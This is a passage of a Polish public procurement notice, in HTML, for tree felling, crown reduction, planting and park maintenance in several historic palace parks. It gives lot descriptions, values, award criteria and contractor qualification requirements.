60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 404/94 obręb Boguszyce, gm. Oleśnica: Redukcja korony w szczytowej części drzewa z<br/>gatunku wiąz szypułkowy – na podstawie załączonej decyzji<br/>Drzewo znajduje się w parku pałacowym, wpisanym do rejestru zabytków pod numerem<br/>A/3524/470/W decyzją z dnia 29.11.1980r. redukcja nie może przekraczać 30% korony drzewa<br/>Wiąz szypułkowy zlokalizowany jest w pobliżu narożnika pałacu, od strony południowowschodniej.<br/>Pokaźna korona koliduje z pracami remontowymi pałacu, wskazane są więc prace<br/>przycinkowe dla danego gatunku. Drzewo jest ZDROWYM OKAZEM i redukcja korony winna<br/>być ograniczona do cięć w wymiarze wystarczającym dla prac remontowych, a pokrój nie<br/>powinien ulec zniekształceniu, zwłaszcza asymetrycznemu ułożeniu.<br/>W czasie prowadzenia prac należy zachować ostrożność, by nie uszkodzić drzew a także<br/>innych elementów zabytkowego parku, znajdujących się w pobliżu. Prace powinny być<br/>wykonane zgodnie ze sztuką arborystyczną i przez osoby posiadające doświadczenie w<br/>wykonywaniu tego typu prac. Po zakończeniu prac należy wykonać prace porządkowe<br/>polegające na zebraniu i wywiezieniu materiału.<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpa4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 966,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 26/3 obręb Moczydlnica Klasztorna, gm. Wińsko:<br/>􀀀 Usunięcie odrośli wegetatywnych drzew i krzewów.<br/>Usunięcie odrośli z użyciem pilarek i kos spalinowych bez ingerencji w podziemną część rośliny.<br/>􀀀 Wykoszenie roślinności zielnej wraz z zebraniem pokosu.<br/>– na podstawie załączonej decyzji. Prace pielęgnacyjne będą wykonywane w parku pałacowym, wpisanym do rejestru zabytków<br/>pod nu-merem A/2960/439/W decyzją z dnia 13.04.1979r.<br/>W czasie prowadzenia prac należy zachować ostrożność, by nie uszkodzić drzew a także<br/>innych elementów zabytkowego parku, znajdujących się w pobliżu. Prace powinny być<br/>wykonane zgodnie ze sztuką arborystyczną i przez osoby posiadające doświadczenie w<br/>wykonywaniu tego typu prac. Po zakończeniu prac należy wykonać prace porządkowe<br/>polegające na zebraniu i wywiezieniu materiału.<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8127,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211500-7 - Usługi pielęgnacji drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 70/9 obręb Wojczyce, gm. Środa Śląska:<br/>􀀀 Usunięcie 1 szt. drzewa: Wierzba krucha, obwód na wys. 1,3 m = 273 cm.<br/>Drzewo jest martwe, stanowi posusz stojący, zlokalizowane w pobliżu szlaku komunikacyjnego.<br/>Lokalizacja oraz stan drzewa nie zezwalają na pozostawienie martwego przewodnika. Drzewo<br/>znajduje się w zbyt bliskiej odległości od pałacu, w części reprezentacyjnej parku, przy polanie.<br/>Po wykonaniu prac należy uporządkować teren wycinki. Bezpośrednio przed planowanym<br/>wycięciem należy dokonać oglądu drzewa, celem stwierdzenia czy nie zostało w międzyczasie<br/>zasiedlone przez gatunki chronione grzybów, roślin lub zwierząt.<br/>Wycinka drzewa przy pomocy pilarki spalinowej równo z poziomem gruntu, bez ingerencji w<br/>podziemną część rośliny.<br/>􀀀 Usunięcie odrośli wegetatywnych drzew i krzewów; Wykoszenie roślinności zielnej wraz z<br/>zebraniem pokosu.<br/>Usunięcie odrośli przy użyciu kos i pilarek spalinowych bez ingerencji w podziemną część roślin.<br/>- na podstawie załączonych decyzji<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9096,69 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 1/17 obręb Solna, gm. Kobierzyce:<br/>􀀀 Usunięcie 12 szt. drzew:<br/>- robinia akacjowa – szt. 5, na wys. 1,3 m = 120 cm, 130 cm, 165 cm, 150 cm, 90 cm;<br/>- klon zwyczajny – szt. 6, na wys. 1,3 m = 190 cm, 150 cm, 100 cm, 115 cm, 100 cm, 90cm<br/>- jesion wyniosły – szt. 1, na wys. 1,3 m = 120 cm;<br/>Wskazane do usunięcia drzewa są w stanie zamierania, posiadają znaczne ubytki ze zgnilizną,<br/>ślady żerowania owadów oraz oznaki zamierania w postaci znacznego suszu gałęziowego w<br/>konarach.<br/>􀀀 Usunięcie wiatrołomów i wywrotów, stanowiących leżaninę; redukcja pniaków i pozostałości<br/>po wyło-mach, do poziomu gruntu;<br/>Wskazane do usunięcia drzewa uległy uszkodzeniu podczas niekorzystnych warunków<br/>atmosferycznych. Drzewa stanowią złomy i wywroty na terenie parku. Pozostałości<br/>przewodników oraz pniaki należy usunąć, poprzez przycięcie równo z linią gruntu.<br/>􀀀 Wykonanie nasadzeń zastępczych w ilości 25 drzew jako rekompensatę za usunięcie drzew.<br/>Nasadzenia winny być wykonane w gatunku lipa drobnolistna, lipa krymska, tulipanowiec<br/>amerykański (w miejscu zbliżonym do lokalizacji złomu drzewa) klon jawor, klon zwyczajny, dąb<br/>szypułkowy, buk pospolity. Pnie sadzonek na wysokości 100 cm powinny mieć obwód 14-16 cm<br/>i prawidłowo rozwiniętą koronę z min. 4 rozgałęzieniami. Drzewa należy ustabilizować przy<br/>pomocy palików i elastycznych taśm;<br/>􀀀 Redukcja złamanych konarów, usunięcie posuszu, korekta korony;<br/>􀀀 Usunięcie odrośli wegetatywnych drzew i krzewów; Wykoszenie roślinności zielnej wraz z<br/>zebraniem pokosu przy użyciu kos i npilarek spalinowych bez ingerencji w podziemną część<br/>roślin;<br/>- na podstawie załączonych decyzji<br/>Prace pielęgnacyjne będą wykonywane w parku zabytkowym, wpisanym do rejestru zabytków<br/>pod numerem A/3849/545/W decyzją z dnia 31.01.1994r. W czasie prowadzenia prac należy zachować ostrożność, by nie uszkodzić drzew a także<br/>innych elementów zabytkowego parku, znajdujących się w pobliżu. Prace powinny być<br/>wykonane przez osoby posiadające doświadczenie w wykonywaniu tego typu prac. Po<br/>zakończeniu prac należy wykonać prace porządkowe polegające na zebraniu i wywiezieniu<br/>materiału.<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>W zakresie wykonania nasadzeń zastępczych drzew Wykonawca zobowiązany jest do:<br/>1. wykonania nasadzenia zgodnie ze sztuką ogrodniczą, tak aby przetrwało do kolejnego okresu<br/>wegetacyjnego,<br/>2. sadzenia drzew, zaprawy dołów torfem i obfitego podlania nasadzeń (wg wytycznych<br/>zawartych w decyzji),<br/>3. zamontowania mocowań do drzewek (wg wytycznych zawartych w decyzji lub co najmniej 2<br/>paliki) – paliki nie mogą ocierać żadnej części drzewa,<br/>4. założenia siatki ochronnej o wysokości minimum 50 cm na sadzonych drzewach w celu<br/>zabezpieczenia nasadzeń lub zabezpieczenia wg wytycznych zawartych w decyzji,<br/>5. uporządkowania terenu po wykonaniu prac.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 33794,56 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211400-6 - Usługi wycinania drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211500-7 - Usługi pielęgnacji drzew</p> <p class="mb-0">77211600-8 - Sadzenie drzew</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dz. nr 6/8 AM6 obręb Jarnołtów, gm. Wrocław: Redukcja korony drzewa z gatunku Wierzba biała<br/>o obwodzie pnia na wysokości 1,3 m = 330 cm<br/>Drzewo charakteryzuje się silnym wypróchnieniem pnia na skutek rozkładu – zgnilizny<br/>brunatnej. Drzewo znajduje się w dawnym korycie młyńskim, w pobliżu zatoczki autobusowej i<br/>zabytkowego młyna wodnego. Redukcja korony nie może przekraczać 30% korony drzewa,<br/>cięcie wymaga użycia technik alpinistycznych i dostępu linowego. Prace powinny być wykonane<br/>przez osoby posiadające doświadczenie w wykonywaniu tego typu prac. Po zakończeniu prac<br/>należy wykonać prace porządkowe polegające na zebraniu i wywiezieniu materiału.<br/>W zakresie usunięcia i zabiegów pielęgnacyjnych drzew Wykonawca zobowiązany jest do:<br/>1. wyrobienia drewna, pocięcia i złożenia w stosy – maksymalna dopuszczalna długość wyrzynków<br/>i wałków drewna wynosi 2,4m,<br/>2. uprzątnięcia i utylizacji resztek po wyciętych drzewach oraz innych odpadów powstałych w<br/>wyniku przeprowadzonych prac, zgodnie z właściwymi przepisami powszechnie obowiązującymi<br/>(dopuszcza się pozostawienie odpadów powycinkowych w miejscu prac, w postaci zręb-ki<br/>równomiernie rozrzuconej na terenie),<br/>3. uporządkowania terenu po wycince drzew, wywiezienie gałęzi i konarów - zakazuje się rozpalania<br/>ognisk celem utylizacji odpadów powycinkowych,<br/>4. zakupu i wywiezienia pozyskanego drewna,<br/>5. wykonania wiązań na drzewach o parametrach nie gorszych niż np. Cobra, Boa itp.<br/>(parametry potwierdzone odpowiednimi dokumentami) oraz montaż zgodny ze sztuką i wiedzą<br/>arbory-styczną.<br/>Pozostałe warunki realizacji zamówienia zawarte są w decyzjach administracyjnych oraz w<br/>projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy<br/>stanowiących załączniki nr 7 i 8 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją<br/>projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 966,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211500-7 - Usługi pielęgnacji drzew</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących<br/>kryteriów:1.Kryterium „Cena brutto za przedmiot zamówienia” (Kc) – waga 60 % 2. Kryterium „Termin<br/>wykonaniaprzedmiotu zamówienia” (Kt) – waga 40 % Sposób przyznania punktów opisano w ust. 19<br/>SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>spełniają warunki udziału w postępowaniu - dotyczące:<br/>11.2.1 zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>11.2.2 uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z<br/>odrębnych przepisów Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>11.2.3 sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>11.2.4 zdolności technicznej lub zawodowej<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>1) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał:<br/>- 2 usługi polegające na wycięciu drzew (w przypadku ubiegania się o przedmioty od 1 do 7<br/>zamówienia)<br/>- 2 usługi polegające na cięciach pielęgnacyjnych wykonanych w obrębie parków wpisanych do<br/>rejestru zabytków (w przypadku ubiegania się o przedmioty 3, 4, 5, 6 zamówienia)<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli co najmniej jeden z wykonawców<br/>wykaże się całym wymaganym doświadczeniem. Zamawiający nie uzna warunku za spełniony,<br/>jeżeli uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich<br/>indywidualnie nie wykaże wykonywaniem całego wymaganego zakresu.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z<br/>innymi wykonawcami, wykaz usług dotyczy usług, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>2) w przypadku ubiegania się o przedmioty 1, 3, 4, 5, 7 zamówienia - dysponuje osobami<br/>skierowanymi do realizacji zamówienia, w szczególności odpowiedzialnymi za świadczenie<br/>usług, tj.:<br/>- co najmniej 1 osobą posiadającą: ukończone szkolenie branżowe – arborysty oraz minimum 3<br/>letnie doświadczenie zawodowe w cięciu lub pielęgnacji drzew na wysokości;<br/>- co najmniej 1 osobą posiadającą: ukończone szkolenie branżowe – drwala (pilarza) oraz<br/>minimum 3 letnie doświadczenie zawodowe w cięciu lub pielęgnacji drzew przy wykorzystaniu<br/>pilarki spalinowej<br/>Warunek zostanie również uznany za spełniony, gdy Wykonawca wykaże dysponowanie jedną<br/>osobą posiadającą wszystkie wymagane szkolenia i doświadczenie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o braku podstaw do wykluczenia z<br/>postępowania - zgodne co do treści 